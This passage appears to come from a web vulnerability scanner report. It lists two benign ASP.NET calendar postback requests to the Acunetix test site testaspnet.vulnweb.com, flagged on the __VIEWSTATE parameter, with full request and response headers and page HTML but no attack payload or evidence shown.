style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8202&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDABSgrT9oIZGRkWjLrhJ7SDtNBA9mZcv6Y%2FRduTRE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B%2FJTRDgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2FOoXkDle5%2BsmuGzDAIVT4SkaIdMg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:51 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDABSgrT9oIZGRkWjLrhJ7SDtNBA9mZcv6Y/RduTRE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL+/JTRDgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w/OoXkDle5+smuGzDAIVT4SkaIdMg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:White" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8190&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAECu9RdoIZGRkSsDs3%2FHqy544BhEozh5V7eTFdyI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpxcvaBQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9uLSNdOLUtJxRDs24sKpvnaNwraQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:35 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAECu9RdoIZGRkSsDs3/Hqy544BhEozh5V7eTFdyI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpxcvaBQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9uLSNdOLUtJxRDs24sKpvnaNwraQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:White" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 